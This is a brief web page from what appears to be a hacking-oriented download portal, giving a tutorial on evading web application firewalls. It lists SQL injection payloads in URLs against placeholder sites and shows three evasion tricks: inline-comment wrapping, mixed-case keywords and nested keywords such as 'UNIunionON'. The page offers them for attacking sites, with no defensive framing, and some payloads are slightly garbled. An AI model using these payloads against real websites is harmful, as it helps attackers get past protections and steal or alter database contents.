DOWNLOAD PORTALS AND LATEST S APP |
LATEST NEWS | ALL MOST WANTED JAVA APPLICATION FREE DOWNLOAD |
HOW TO BUILD A SITE ASK QUESTION FROM THIS PORTAL | ALL HACKING APPLICATION FOR ANDROID |
Bypass Web
Application Firewalls
Web application firewalls
are designed to protect
web applications from
known attacks, such as
SQL injection attacks, that
are commonly used to
compromise websites.
They do this by
intercepting requests sent
by clients and enforcing
strict rules about their
formatting and payload.
Today we demonstrate
some tricks to bypass
Web application firewall
(WAF).
Sqli
http://xyz.com/detail.php?
id=44 union all select
1,2,3,4,5— –
By passed Sqli
http://xyz.com/detailphp?
id=44 /!UNION/ +/!
ALL/+/!SELECT/
+1,2,3,4,5— –
By Function
Capitalization:-
Some Web Application
Firewalls will filter only
lowercase alphabets, So
we can easily bypass by
case changing.
Actual query
http://xyz.com/detail.php?
id=44 UNION SELECT
1,2,3,4,5—
Query to bypass the
WAF
http://xyz.com/detail.php?
id=-1 uniOn SeLeCt
1,2,3,4,5—
By Replaced
Keywords:-
Some WAF’s will escape
certain keywords such as
UNION, SELECT, ORDER
BY, etc. This can be used
to our advantage by
duplicating the detected
word within another like
below script.
Actual query
http://vulnerablesite.com/
detail.php?id=-1 UNION
SELECT 1,2,3,4,5—
Query to bypass the
WAF
http://vulnerablesite.com/
detail.php?id=-1
UNIunionON SEselectLECT
1,2,3,4,5– –
We hope you enjoyed
this trick.!!